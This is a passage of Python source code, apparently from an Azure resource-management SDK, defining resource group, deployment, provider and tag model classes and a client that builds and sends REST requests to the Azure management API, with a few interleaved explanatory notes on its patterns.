def __init__(self, **kwargs):
super(ResourceGroupExistsResult, self).__init__(**kwargs)
self._exists = kwargs.get('exists')
@property
def exists(self):
"""
Gets or sets the value indicating whether the resource group exists.
"""
return self._exists
@exists.setter
def exists(self, value):
self._exists = value
class ResourceGroupCreateOrUpdateResult(AzureOperationResponse):
"""
Resource group information.
"""
def __init__(self, **kwargs):
super(ResourceGroupCreateOrUpdateResult, self).__init__(**kwargs)
self._resource_group = kwargs.get('resource_group')
@property
def resource_group(self):
"""
Gets or sets the resource group.
"""
return self._resource_group
@resource_group.setter
def resource_group(self, value):
self._resource_group = value
class ResourceGroup(object):
"""
Resource group information.
"""
def __init__(self, **kwargs):
self._location = kwargs.get('location')
self._properties = kwargs.get('properties')
self._tags = kwargs.get('tags')
self._provisioning_state = kwargs.get('provisioning_state')
@property
def location(self):
"""
Gets or sets the location of the resource group. It cannot be changed
after the resource group has been created. Has to be one of the
supported Azure Locations, such as West US, East US, West Europe,
East Asia, etc.
"""
return self._location
@location.setter
def location(self, value):
self._location = value
@property
def properties(self):
"""
Gets or sets the resource group properties.
"""
return self._properties
@properties.setter
def properties(self, value):
self._properties = value
@property
def provisioning_state(self):
"""
Gets or sets resource group provisioning state.
"""
return self._provisioning_state
@provisioning_state.setter
def provisioning_state(self, value):
self._provisioning_state = value
@property
def tags(self):
"""
Gets or sets the tags attached to the resource group.
"""
return self._tags
@tags.setter
def tags(self, value):
self._tags = value
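Every model class in this module follows the same shape: kwargs-driven construction into private attributes, exposed through property getter/setter pairs. A standalone sketch of the pattern, mirroring `ResourceGroup` without importing the SDK (the class name here is hypothetical):

```python
class ResourceGroupSketch(object):
    """Minimal stand-in mirroring the kwargs/property pattern of ResourceGroup."""

    def __init__(self, **kwargs):
        # kwargs.get() leaves unset fields as None, matching the generated code.
        self._location = kwargs.get('location')
        self._tags = kwargs.get('tags')

    @property
    def location(self):
        return self._location

    @location.setter
    def location(self, value):
        self._location = value

    @property
    def tags(self):
        return self._tags

    @tags.setter
    def tags(self, value):
        self._tags = value


group = ResourceGroupSketch(location='West US', tags={'env': 'test'})
group.location = 'East US'  # setters simply overwrite the private attribute
```

The pattern keeps the generated classes uniform and lets callers construct any model from a plain keyword dictionary.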
class ResourceGroupGetResult(AzureOperationResponse):
"""
Resource group information.
"""
def __init__(self, **kwargs):
super(ResourceGroupGetResult, self).__init__(**kwargs)
self._resource_group = kwargs.get('resource_group')
@property
def resource_group(self):
"""
Gets or sets the resource group.
"""
return self._resource_group
@resource_group.setter
def resource_group(self, value):
self._resource_group = value
class ResourceGroupListResult(AzureOperationResponse):
"""
List of resource groups.
"""
def __init__(self, **kwargs):
super(ResourceGroupListResult, self).__init__(**kwargs)
self._resource_groups = kwargs.get('resource_groups')
self._next_link = kwargs.get('next_link')
@property
def next_link(self):
"""
Gets or sets the URL to get the next set of results.
"""
return self._next_link
@next_link.setter
def next_link(self, value):
self._next_link = value
@property
def resource_groups(self):
"""
Gets or sets the list of resource groups.
"""
return self._resource_groups
@resource_groups.setter
def resource_groups(self, value):
self._resource_groups = value
class ResourceGroupListParameters(object):
"""
Resource group list operation parameters.
"""
def __init__(self, **kwargs):
self._tag_name = kwargs.get('tag_name')
self._tag_value = kwargs.get('tag_value')
self._top = kwargs.get('top')
@property
def tag_name(self):
"""
Filter the results based on a particular tag name. Optional.
"""
return self._tag_name
@tag_name.setter
def tag_name(self, value):
self._tag_name = value
@property
def tag_value(self):
"""
Filter the results for a tag name along with a particular tag value.
Optional.
"""
return self._tag_value
@tag_value.setter
def tag_value(self, value):
self._tag_value = value
@property
def top(self):
"""
Number of records to return. Optional.
"""
return self._top
@top.setter
def top(self, value):
self._top = value
class ResourceGroupPatchResult(AzureOperationResponse):
"""
Resource group information.
"""
def __init__(self, **kwargs):
super(ResourceGroupPatchResult, self).__init__(**kwargs)
self._resource_group = kwargs.get('resource_group')
@property
def resource_group(self):
"""
Gets or sets the resource group.
"""
return self._resource_group
@resource_group.setter
def resource_group(self, value):
self._resource_group = value
class DeploymentValidateResponse(AzureOperationResponse):
"""
Information from validate template deployment response.
"""
def __init__(self, **kwargs):
super(DeploymentValidateResponse, self).__init__(**kwargs)
self._is_valid = kwargs.get('is_valid')
self._error = kwargs.get('error')
self._properties = kwargs.get('properties')
@property
def error(self):
"""
Gets or sets validation error.
"""
return self._error
@error.setter
def error(self, value):
self._error = value
@property
def is_valid(self):
"""
Gets or sets the value indicating whether the template is valid or not.
"""
return self._is_valid
@is_valid.setter
def is_valid(self, value):
self._is_valid = value
@property
def properties(self):
"""
Gets or sets the template deployment properties.
"""
return self._properties
@properties.setter
def properties(self, value):
self._properties = value
class Deployment(object):
"""
Deployment operation parameters.
"""
def __init__(self, **kwargs):
self._properties = kwargs.get('properties')
@property
def properties(self):
"""
Gets or sets the deployment properties.
"""
return self._properties
@properties.setter
def properties(self, value):
self._properties = value
class DeploymentOperationsCreateResult(AzureOperationResponse):
"""
Template deployment operation create result.
"""
def __init__(self, **kwargs):
super(DeploymentOperationsCreateResult, self).__init__(**kwargs)
self._deployment = kwargs.get('deployment')
@property
def deployment(self):
"""
Gets or sets the deployment.
"""
return self._deployment
@deployment.setter
def deployment(self, value):
self._deployment = value
class DeploymentGetResult(AzureOperationResponse):
"""
Template deployment information.
"""
def __init__(self, **kwargs):
super(DeploymentGetResult, self).__init__(**kwargs)
self._deployment = kwargs.get('deployment')
@property
def deployment(self):
"""
Gets or sets the deployment.
"""
return self._deployment
@deployment.setter
def deployment(self, value):
self._deployment = value
class DeploymentListResult(AzureOperationResponse):
"""
List of deployments.
"""
def __init__(self, **kwargs):
super(DeploymentListResult, self).__init__(**kwargs)
self._deployments = kwargs.get('deployments')
self._next_link = kwargs.get('next_link')
@property
def deployments(self):
"""
Gets or sets the list of deployments.
"""
return self._deployments
@deployments.setter
def deployments(self, value):
self._deployments = value
@property
def next_link(self):
"""
Gets or sets the URL to get the next set of results.
"""
return self._next_link
@next_link.setter
def next_link(self, value):
self._next_link = value
class DeploymentListParameters(object):
"""
Deployment list operation parameters.
"""
def __init__(self, **kwargs):
self._top = kwargs.get('top')
self._provisioning_state = kwargs.get('provisioning_state')
@property
def provisioning_state(self):
"""
Gets or sets the provisioning state to filter by. Optional.
"""
return self._provisioning_state
@provisioning_state.setter
def provisioning_state(self, value):
self._provisioning_state = value
@property
def top(self):
"""
Gets or sets the number of records to return. Optional.
"""
return self._top
@top.setter
def top(self, value):
self._top = value
class ResourceManagementError(object):
def __init__(self, **kwargs):
self._code = kwargs.get('code')
self._message = kwargs.get('message')
self._target = kwargs.get('target')
@property
def code(self):
"""
Gets or sets the error code returned from the server.
"""
return self._code
@code.setter
def code(self, value):
self._code = value
@property
def message(self):
"""
Gets or sets the error message returned from the server.
"""
return self._message
@message.setter
def message(self, value):
self._message = value
@property
def target(self):
"""
Gets or sets the target of the error.
"""
return self._target
@target.setter
def target(self, value):
self._target = value
class ResourceManagementErrorWithDetails(ResourceManagementError):
def __init__(self, **kwargs):
super(ResourceManagementErrorWithDetails, self).__init__(**kwargs)
self._details = kwargs.get('details')
@property
def details(self):
"""
Gets or sets the error details.
"""
return self._details
@details.setter
def details(self, value):
self._details = value
class Provider(AzureOperationResponse):
"""
Resource provider information.
"""
def __init__(self, **kwargs):
super(Provider, self).__init__(**kwargs)
self._id = kwargs.get('id')
self._namespace = kwargs.get('namespace')
self._registration_state = kwargs.get('registration_state')
self._resource_types = kwargs.get('resource_types')
@property
def id(self):
"""
Gets or sets the provider id.
"""
return self._id
@id.setter
def id(self, value):
self._id = value
@property
def namespace(self):
"""
Gets or sets the namespace of the provider.
"""
return self._namespace
@namespace.setter
def namespace(self, value):
self._namespace = value
@property
def registration_state(self):
"""
Gets or sets the registration state of the provider.
"""
return self._registration_state
@registration_state.setter
def registration_state(self, value):
self._registration_state = value
@property
def resource_types(self):
"""
Gets or sets the collection of provider resource types.
"""
return self._resource_types
@resource_types.setter
def resource_types(self, value):
self._resource_types = value
class ProviderRegistrationState(object):
"""
Provider registration states.
"""
not_registered = 'NotRegistered'
unregistering = 'Unregistering'
registering = 'Registering'
registered = 'Registered'
class ProviderResourceType(object):
"""
Resource type managed by the resource provider.
"""
def __init__(self, **kwargs):
self._name = kwargs.get('name')
self._locations = kwargs.get('locations')
self._api_versions = kwargs.get('api_versions')
self._properties = kwargs.get('properties')
@property
def api_versions(self):
"""
Gets or sets the api version.
"""
return self._api_versions
@api_versions.setter
def api_versions(self, value):
self._api_versions = value
@property
def locations(self):
"""
Gets or sets the collection of locations in which this resource type
can be created.
"""
return self._locations
@locations.setter
def locations(self, value):
self._locations = value
@property
def name(self):
"""
Gets or sets the resource type.
"""
return self._name
@name.setter
def name(self, value):
self._name = value
@property
def properties(self):
"""
Gets or sets the properties.
"""
return self._properties
@properties.setter
def properties(self, value):
self._properties = value
class GenericResourceExtended(ResourceBaseExtended):
"""
Resource information.
"""
def __init__(self, **kwargs):
super(GenericResourceExtended, self).__init__(**kwargs)
self._properties = kwargs.get('properties')
self._provisioning_state = kwargs.get('provisioning_state')
self._plan = kwargs.get('plan')
@property
def plan(self):
"""
Gets or sets the plan of the resource.
"""
return self._plan
@plan.setter
def plan(self, value):
self._plan = value
@property
def properties(self):
"""
Gets or sets the resource properties.
"""
return self._properties
@properties.setter
def properties(self, value):
self._properties = value
@property
def provisioning_state(self):
"""
Gets or sets resource provisioning state.
"""
return self._provisioning_state
@provisioning_state.setter
def provisioning_state(self, value):
self._provisioning_state = value
class ProvisioningState(object):
"""
Common provisioning states.
"""
not_specified = 'NotSpecified'
accepted = 'Accepted'
running = 'Running'
registering = 'Registering'
creating = 'Creating'
created = 'Created'
deleting = 'Deleting'
deleted = 'Deleted'
canceled = 'Canceled'
failed = 'Failed'
succeeded = 'Succeeded'
class Plan(object):
"""
Plan for the resource.
"""
def __init__(self, **kwargs):
self._name = kwargs.get('name')
self._publisher = kwargs.get('publisher')
self._product = kwargs.get('product')
self._promotion_code = kwargs.get('promotion_code')
@property
def name(self):
"""
Gets or sets the plan ID.
"""
return self._name
@name.setter
def name(self, value):
self._name = value
@property
def product(self):
"""
Gets or sets the offer ID.
"""
return self._product
@product.setter
def product(self, value):
self._product = value
@property
def promotion_code(self):
"""
Gets or sets the promotion code.
"""
return self._promotion_code
@promotion_code.setter
def promotion_code(self, value):
self._promotion_code = value
@property
def publisher(self):
"""
Gets or sets the publisher ID.
"""
return self._publisher
@publisher.setter
def publisher(self, value):
self._publisher = value
class TagValue(object):
"""
Tag information.
"""
def __init__(self, **kwargs):
self._id = kwargs.get('id')
self._value = kwargs.get('value')
self._count = kwargs.get('count')
@property
def count(self):
"""
Gets or sets the tag value count.
"""
return self._count
@count.setter
def count(self, value):
self._count = value
@property
def id(self):
"""
Gets or sets the tag ID.
"""
return self._id
@id.setter
def id(self, value):
self._id = value
@property
def value(self):
"""
Gets or sets the tag value.
"""
return self._value
@value.setter
def value(self, value):
self._value = value
class TagCount(object):
"""
Tag count.
"""
def __init__(self, **kwargs):
self._type = kwargs.get('type')
self._value = kwargs.get('value')
@property
def type(self):
"""
Type of count.
"""
return self._type
@type.setter
def type(self, value):
self._type = value
@property
def value(self):
"""
Value of count.
"""
return self._value
@value.setter
def value(self, value):
self._value = value
class TagDetails(object):
"""
Tag details.
"""
def __init__(self, **kwargs):
self._id = kwargs.get('id')
self._name = kwargs.get('name')
self._count = kwargs.get('count')
self._values = kwargs.get('values')
@property
def count(self):
"""
Gets or sets the tag count.
"""
return self._count
@count.setter
def count(self, value):
self._count = value
@property
def id(self):
"""
Gets or sets the tag ID.
"""
return self._id
@id.setter
def id(self, value):
self._id = value
@property
def name(self):
"""
Gets or sets the tag name.
"""
return self._name
@name.setter
def name(self, value):
self._name = value
@property
def values(self):
"""
Gets or sets the list of tag values.
"""
return self._values
@values.setter
def values(self, value):
self._values = value
class DeploymentOperation(object):
"""
Deployment operation information.
"""
def __init__(self, **kwargs):
self._id = kwargs.get('id')
self._operation_id = kwargs.get('operation_id')
self._properties = kwargs.get('properties')
@property
def id(self):
"""
Gets or sets the full deployment operation ID.
"""
return self._id
@id.setter
def id(self, value):
self._id = value
@property
def operation_id(self):
"""
Gets or sets the deployment operation ID.
"""
return self._operation_id
@operation_id.setter
def operation_id(self, value):
self._operation_id = value
@property
def properties(self):
"""
Gets or sets deployment properties.
"""
return self._properties
@properties.setter
def properties(self, value):
self._properties = value
class DeploymentOperationProperties(object):
"""
Deployment operation properties.
"""
def __init__(self, **kwargs):
self._provisioning_state = kwargs.get('provisioning_state')
self._timestamp = kwargs.get('timestamp')
self._status_code = kwargs.get('status_code')
self._status_message = kwargs.get('status_message')
self._target_resource = kwargs.get('target_resource')
@property
def provisioning_state(self):
"""
Gets or sets the state of the provisioning.
"""
return self._provisioning_state
@provisioning_state.setter
def provisioning_state(self, value):
self._provisioning_state = value
@property
def status_code(self):
"""
Gets or sets operation status code.
"""
return self._status_code
@status_code.setter
def status_code(self, value):
self._status_code = value
@property
def status_message(self):
"""
Gets or sets operation status message.
"""
return self._status_message
@status_message.setter
def status_message(self, value):
self._status_message = value
@property
def target_resource(self):
"""
Gets or sets the target resource.
"""
return self._target_resource
@target_resource.setter
def target_resource(self, value):
self._target_resource = value
@property
def timestamp(self):
"""
Gets or sets the date and time of the operation.
"""
return self._timestamp
@timestamp.setter
def timestamp(self, value):
self._timestamp = value
class TargetResource(object):
"""
Target resource.
"""
def __init__(self, **kwargs):
self._id = kwargs.get('id')
self._resource_name = kwargs.get('resource_name')
self._resource_type = kwargs.get('resource_type')
@property
def id(self):
"""
Gets or sets the ID of the resource.
"""
return self._id
@id.setter
def id(self, value):
self._id = value
@property
def resource_name(self):
"""
Gets or sets the name of the resource.
"""
return self._resource_name
@resource_name.setter
def resource_name(self, value):
self._resource_name = value
@property
def resource_type(self):
"""
Gets or sets the type of the resource.
"""
return self._resource_type
@resource_type.setter
def resource_type(self, value):
self._resource_type = value
class ResourceProviderOperationDefinition(object):
"""
Resource provider operation information.
"""
def __init__(self, **kwargs):
self._name = kwargs.get('name')
self._resource_provider_operation_display_properties = kwargs.get('resource_provider_operation_display_properties')
@property
def name(self):
"""
Gets or sets the provider operation name.
"""
return self._name
@name.setter
def name(self, value):
self._name = value
@property
def resource_provider_operation_display_properties(self):
"""
Gets or sets the display property of the provider operation.
"""
return self._resource_provider_operation_display_properties
@resource_provider_operation_display_properties.setter
def resource_provider_operation_display_properties(self, value):
self._resource_provider_operation_display_properties = value
class ResourceProviderOperationDisplayProperties(object):
"""
Resource provider operation's display properties.
"""
def __init__(self, **kwargs):
self._publisher = kwargs.get('publisher')
self._provider = kwargs.get('provider')
self._resource = kwargs.get('resource')
self._operation = kwargs.get('operation')
self._description = kwargs.get('description')
@property
def description(self):
"""
Gets or sets operation description.
"""
return self._description
@description.setter
def description(self, value):
self._description = value
@property
def operation(self):
"""
Gets or sets operation.
"""
return self._operation
@operation.setter
def operation(self, value):
self._operation = value
@property
def provider(self):
"""
Gets or sets operation provider.
"""
return self._provider
@provider.setter
def provider(self, value):
self._provider = value
@property
def publisher(self):
"""
Gets or sets operation publisher.
"""
return self._publisher
@publisher.setter
def publisher(self, value):
self._publisher = value
@property
def resource(self):
"""
Gets or sets operation resource.
"""
return self._resource
@resource.setter
def resource(self, value):
self._resource = value
class ResourceGroupExtended(ResourceGroup):
"""
Resource group information.
"""
def __init__(self, **kwargs):
super(ResourceGroupExtended, self).__init__(**kwargs)
self._id = kwargs.get('id')
self._name = kwargs.get('name')
@property
def id(self):
"""
Gets or sets the ID of the resource group.
"""
return self._id
@id.setter
def id(self, value):
self._id = value
@property
def name(self):
"""
Gets or sets the name of the resource group.
"""
return self._name
@name.setter
def name(self, value):
self._name = value
class DeploymentProperties(object):
"""
Deployment properties.
"""
def __init__(self, **kwargs):
self._template = kwargs.get('template')
self._template_link = kwargs.get('template_link')
self._parameters = kwargs.get('parameters')
self._parameters_link = kwargs.get('parameters_link')
self._mode = kwargs.get('mode')
@property
def mode(self):
"""
Gets or sets the deployment mode.
"""
return self._mode
@mode.setter
def mode(self, value):
self._mode = value
@property
def parameters(self):
"""
Deployment parameters. Use only one of Parameters or ParametersLink.
"""
return self._parameters
@parameters.setter
def parameters(self, value):
self._parameters = value
@property
def parameters_link(self):
"""
Gets or sets the URI referencing the parameters. Use only one of
Parameters or ParametersLink.
"""
return self._parameters_link
@parameters_link.setter
def parameters_link(self, value):
self._parameters_link = value
@property
def template(self):
"""
Gets or sets the template content. Use only one of Template or
TemplateLink.
"""
return self._template
@template.setter
def template(self, value):
self._template = value
@property
def template_link(self):
"""
Gets or sets the URI referencing the template. Use only one of
Template or TemplateLink.
"""
return self._template_link
@template_link.setter
def template_link(self, value):
self._template_link = value
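The docstrings above state that callers should supply only one of Template or TemplateLink, and only one of Parameters or ParametersLink, but the class does not enforce this. A hypothetical helper (not part of this module) that enforces the rule could look like:

```python
# Hypothetical validation helper for the "use only one of X or XLink"
# rule stated in the DeploymentProperties docstrings.
def check_exclusive(inline_value, link_value, name):
    if inline_value is not None and link_value is not None:
        raise ValueError('Use only one of %s or %sLink.' % (name, name))
```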
class DeploymentPropertiesExtended(DeploymentProperties):
"""
Deployment properties with additional details.
"""
def __init__(self, **kwargs):
super(DeploymentPropertiesExtended, self).__init__(**kwargs)
self._provisioning_state = kwargs.get('provisioning_state')
self._correlation_id = kwargs.get('correlation_id')
self._timestamp = kwargs.get('timestamp')
self._outputs = kwargs.get('outputs')
self._providers = kwargs.get('providers')
self._dependencies = kwargs.get('dependencies')
@property
def correlation_id(self):
"""
Gets or sets the correlation ID of the deployment.
"""
return self._correlation_id
@correlation_id.setter
def correlation_id(self, value):
self._correlation_id = value
@property
def dependencies(self):
"""
Gets the list of deployment dependencies.
"""
return self._dependencies
@dependencies.setter
def dependencies(self, value):
self._dependencies = value
@property
def outputs(self):
"""
Gets or sets the key/value pairs that represent the deployment output.
"""
return self._outputs
@outputs.setter
def outputs(self, value):
self._outputs = value
@property
def providers(self):
"""
Gets the list of resource providers needed for the deployment.
"""
return self._providers
@providers.setter
def providers(self, value):
self._providers = value
@property
def provisioning_state(self):
"""
Gets or sets the state of the provisioning.
"""
return self._provisioning_state
@provisioning_state.setter
def provisioning_state(self, value):
self._provisioning_state = value
@property
def timestamp(self):
"""
Gets or sets the timestamp of the template deployment.
"""
return self._timestamp
@timestamp.setter
def timestamp(self, value):
self._timestamp = value
class TemplateLink(object):
"""
Entity representing the reference to the template.
"""
def __init__(self, **kwargs):
self._uri = kwargs.get('uri')
self._content_version = kwargs.get('content_version')
@property
def content_version(self):
"""
If included it must match the ContentVersion in the template.
"""
return self._content_version
@content_version.setter
def content_version(self, value):
self._content_version = value
@property
def uri(self):
"""
URI referencing the template.
"""
return self._uri
@uri.setter
def uri(self, value):
self._uri = value
class ParametersLink(object):
"""
Entity representing the reference to the deployment parameters.
"""
def __init__(self, **kwargs):
self._uri = kwargs.get('uri')
self._content_version = kwargs.get('content_version')
@property
def content_version(self):
"""
If included it must match the ContentVersion in the template.
"""
return self._content_version
@content_version.setter
def content_version(self, value):
self._content_version = value
@property
def uri(self):
"""
URI referencing the parameters.
"""
return self._uri
@uri.setter
def uri(self, value):
self._uri = value
class DeploymentMode(object):
"""
Specifies the deployment type for the deployment operations.
"""
incremental = "Incremental"
class BasicDependency(object):
"""
Deployment dependency information.
"""
def __init__(self, **kwargs):
self._id = kwargs.get('id')
self._resource_type = kwargs.get('resource_type')
self._resource_name = kwargs.get('resource_name')
@property
def id(self):
"""
Gets or sets the ID of the dependency.
"""
return self._id
@id.setter
def id(self, value):
self._id = value
@property
def resource_name(self):
"""
Gets or sets the dependency resource name.
"""
return self._resource_name
@resource_name.setter
def resource_name(self, value):
self._resource_name = value
@property
def resource_type(self):
"""
Gets or sets the dependency resource type.
"""
return self._resource_type
@resource_type.setter
def resource_type(self, value):
self._resource_type = value
class Dependency(BasicDependency):
"""
Deployment dependency information.
"""
def __init__(self, **kwargs):
super(Dependency, self).__init__(**kwargs)
self._depends_on = kwargs.get('depends_on')
@property
def depends_on(self):
"""
Gets the list of dependencies.
"""
return self._depends_on
@depends_on.setter
def depends_on(self, value):
self._depends_on = value
class DeploymentExtended(object):
"""
Deployment information.
"""
def __init__(self, **kwargs):
self._id = kwargs.get('id')
self._name = kwargs.get('name')
self._properties = kwargs.get('properties')
@property
def id(self):
"""
Gets or sets the ID of the deployment.
"""
return self._id
@id.setter
def id(self, value):
self._id = value
@property
def name(self):
"""
Gets or sets the name of the deployment.
"""
return self._name
@name.setter
def name(self, value):
self._name = value
@property
def properties(self):
"""
Gets or sets deployment properties.
"""
return self._properties
@properties.setter
def properties(self, value):
self._properties = value
class ResourceIdentity(object):
def __init__(self, **kwargs):
self.resource_name = kwargs.get('resource_name')
self.resource_provider_api_version = kwargs.get('api_version')
self.resource_provider_namespace = kwargs.get('resource_namespace')
self.resource_type = kwargs.get('resource_type')
self.parent_resource_path = kwargs.get('parent_resource_path')
class ResourceManagementClient(Service):
@property
def api_version(self):
"""
Gets the API version.
"""
return self._api_version
@property
def long_running_operation_initial_timeout(self):
"""
Gets or sets the initial timeout for Long Running Operations.
"""
return self._long_running_operation_initial_timeout
@long_running_operation_initial_timeout.setter
def long_running_operation_initial_timeout(self, value):
self._long_running_operation_initial_timeout = value
@property
def long_running_operation_retry_timeout(self):
"""
Gets or sets the retry timeout for Long Running Operations.
"""
return self._long_running_operation_retry_timeout
@long_running_operation_retry_timeout.setter
def long_running_operation_retry_timeout(self, value):
self._long_running_operation_retry_timeout = value
@property
def deployment_operations(self):
"""
Operations for managing deployment operations.
"""
return self._deployment_operations
@property
def deployments(self):
"""
Operations for managing deployments.
"""
return self._deployments
@property
def providers(self):
"""
Operations for managing providers.
"""
return self._providers
@property
def resource_groups(self):
"""
Operations for managing resource groups.
"""
return self._resource_groups
@property
def resources(self):
"""
Operations for managing resources.
"""
return self._resources
@property
def resource_provider_operation_details(self):
"""
Operations for managing Resource provider operations.
"""
return self._resource_provider_operation_details
@property
def tags(self):
"""
Operations for managing tags.
"""
return self._tags
def __init__(self, credentials, **kwargs):
super(ResourceManagementClient, self).__init__(credentials, **kwargs)
if getattr(self, '_base_uri', None) is None:
self._base_uri = 'https://management.azure.com/'
if getattr(self, '_api_version', None) is None:
self._api_version = '2014-04-01-preview'
if getattr(self, '_long_running_operation_initial_timeout', None) is None:
self._long_running_operation_initial_timeout = -1
if getattr(self, '_long_running_operation_retry_timeout', None) is None:
self._long_running_operation_retry_timeout = -1
self._deployment_operations = DeploymentOperationOperations(self)
self._deployments = DeploymentOperations(self)
self._providers = ProviderOperations(self)
self._resource_groups = ResourceGroupOperations(self)
self._resources = ResourceOperations(self)
self._resource_provider_operation_details = ResourceProviderOperationDetailsOperations(self)
self._tags = TagOperations(self)
def get_long_running_operation_status(self, operation_status_link):
"""
The Get Operation Status operation returns the status of the specified
operation. After calling an asynchronous operation, you can call Get
Operation Status to determine whether the operation has succeeded,
failed, or is still in progress.
Args:
operation_status_link (string): Location value returned by the Begin
operation.
Returns:
LongRunningOperationResponse: A standard service response for long
running operations.
"""
# Validate
if operation_status_link is None:
raise ValueError('operation_status_link cannot be None.')
# Tracing
# Construct URL
url = ''
url = url + operation_status_link
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'GET'
# Set Headers
http_request.headers['x-ms-version'] = '2014-04-01-preview'
# Send Request
response = self.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code not in (200, 202, 409):
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
result = LongRunningOperationResponse()
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
if status_code == 409:
result.status = OperationStatus.Failed
if status_code == 200:
result.status = OperationStatus.Succeeded
return result
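The method above maps the HTTP status code onto an operation status: 409 becomes Failed and 200 becomes Succeeded. A standalone sketch of that mapping (the string values stand in for the `OperationStatus` constants, which are defined elsewhere; treating 202 as in-progress is an assumption based on the allowed codes):

```python
# Standalone sketch of the status mapping in
# get_long_running_operation_status.
def map_operation_status(status_code):
    if status_code == 409:
        return 'Failed'
    if status_code == 200:
        return 'Succeeded'
    return 'InProgress'  # 202: operation still running (assumption)
```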
class DeploymentOperationOperations(object):
"""
Operations for managing deployment operations.
__NOTE__: An instance of this class is automatically created for each
instance of ResourceManagementClient.
"""
def __init__(self, client):
self._client = client
@property
def client(self):
"""
Gets a reference to the owning ResourceManagementClient.
"""
return self._client
def get(self, resource_group_name, deployment_name, operation_id):
"""
Gets a single deployment operation.
Args:
resource_group_name (string): The name of the resource group. The name
is case insensitive.
deployment_name (string): The name of the deployment.
operation_id (string): Operation Id.
Returns:
DeploymentOperationsGetResult: Deployment operation.
"""
# Validate
if resource_group_name is None:
raise ValueError('resource_group_name cannot be None.')
if resource_group_name is not None and len(resource_group_name) > 1000:
raise IndexError('resource_group_name is outside the valid range.')
if re.search(r'^[-\w\._]+$', resource_group_name) is None:
raise IndexError('resource_group_name is outside the valid range.')
if deployment_name is None:
raise ValueError('deployment_name cannot be None.')
if operation_id is None:
raise ValueError('operation_id cannot be None.')
# Tracing
# Construct URL
url = ''
url = url + '/subscriptions/'
if self.client.credentials.subscription_id is not None:
url = url + quote(self.client.credentials.subscription_id)
url = url + '/resourcegroups/'
url = url + quote(resource_group_name)
url = url + '/deployments/'
url = url + quote(deployment_name)
url = url + '/operations/'
url = url + quote(operation_id)
query_parameters = []
query_parameters.append('api-version=2014-04-01-preview')
if len(query_parameters) > 0:
url = url + '?' + '&'.join(query_parameters)
base_url = self.client.base_uri
# Trim '/' character from the end of baseUrl and beginning of url.
if base_url.endswith('/'):
base_url = base_url[:-1]
if url.startswith('/'):
url = url[1:]
url = base_url + '/' + url
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'GET'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
if status_code == 200:
response_content = body
result = DeploymentOperationsGetResult()
response_doc = None
if response_content:
response_doc = json.loads(response_content.decode())
if response_doc is not None:
operation_instance = DeploymentOperation()
result.operation = operation_instance
id_value = response_doc.get('id', None)
if id_value is not None:
id_instance = id_value
operation_instance.id = id_instance
operation_id_value = response_doc.get('operationId', None)
if operation_id_value is not None:
operation_id_instance = operation_id_value
operation_instance.operation_id = operation_id_instance
properties_value = response_doc.get('properties', None)
if properties_value is not None:
properties_instance = DeploymentOperationProperties()
operation_instance.properties = properties_instance
provisioning_state_value = properties_value.get('provisioningState', None)
if provisioning_state_value is not None:
provisioning_state_instance = provisioning_state_value
properties_instance.provisioning_state = provisioning_state_instance
timestamp_value = properties_value.get('timestamp', None)
if timestamp_value is not None:
timestamp_instance = timestamp_value
properties_instance.timestamp = timestamp_instance
status_code_value = properties_value.get('statusCode', None)
if status_code_value is not None:
status_code_instance = status_code_value
properties_instance.status_code = status_code_instance
status_message_value = properties_value.get('statusMessage', None)
if status_message_value is not None:
status_message_instance = json.dumps(status_message_value)
properties_instance.status_message = status_message_instance
target_resource_value = properties_value.get('targetResource', None)
if target_resource_value is not None:
target_resource_instance = TargetResource()
properties_instance.target_resource = target_resource_instance
id_value2 = target_resource_value.get('id', None)
if id_value2 is not None:
id_instance2 = id_value2
target_resource_instance.id = id_instance2
resource_name_value = target_resource_value.get('resourceName', None)
if resource_name_value is not None:
resource_name_instance = resource_name_value
target_resource_instance.resource_name = resource_name_instance
resource_type_value = target_resource_value.get('resourceType', None)
if resource_type_value is not None:
resource_type_instance = resource_type_value
target_resource_instance.resource_type = resource_type_instance
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
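The `get` method builds its request URL piecewise from percent-quoted path segments, then joins it to the trimmed base URL. A self-contained sketch of that construction using the stdlib `quote` (the function name and argument names are illustrative only):

```python
from urllib.parse import quote

# Standalone sketch of the URL construction performed in get().
def build_operation_url(base_url, subscription_id, group, deployment, op_id):
    url = ('/subscriptions/' + quote(subscription_id)
           + '/resourcegroups/' + quote(group)
           + '/deployments/' + quote(deployment)
           + '/operations/' + quote(op_id)
           + '?api-version=2014-04-01-preview')
    # Trim '/' from the end of base_url and the beginning of url so
    # exactly one slash joins them, as the method does.
    return base_url.rstrip('/') + '/' + url.lstrip('/')
```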
def list(self, resource_group_name, deployment_name, parameters):
"""
Gets a list of deployment operations.
Args:
resource_group_name (string): The name of the resource group. The name
is case insensitive.
deployment_name (string): The name of the deployment.
parameters (DeploymentOperationsListParameters): Query parameters.
Returns:
DeploymentOperationsListResult: List of deployment operations.
"""
# Validate
if resource_group_name is None:
raise ValueError('resource_group_name cannot be None.')
if resource_group_name is not None and len(resource_group_name) > 1000:
raise IndexError('resource_group_name is outside the valid range.')
if re.search(r'^[-\w\._]+$', resource_group_name) is None:
raise IndexError('resource_group_name is outside the valid range.')
if deployment_name is None:
raise ValueError('deployment_name cannot be None.')
# Tracing
# Construct URL
url = ''
url = url + '/subscriptions/'
if self.client.credentials.subscription_id is not None:
url = url + quote(self.client.credentials.subscription_id)
url = url + '/resourcegroups/'
url = url + quote(resource_group_name)
url = url + '/deployments/'
url = url + quote(deployment_name)
url = url + '/operations'
query_parameters = []
if parameters is not None and parameters.top is not None:
query_parameters.append('$top=' + quote(str(parameters.top)))
query_parameters.append('api-version=2014-04-01-preview')
if len(query_parameters) > 0:
url = url + '?' + '&'.join(query_parameters)
base_url = self.client.base_uri
# Trim '/' character from the end of baseUrl and beginning of url.
if base_url.endswith('/'):
base_url = base_url[:-1]
if url.startswith('/'):
url = url[1:]
url = base_url + '/' + url
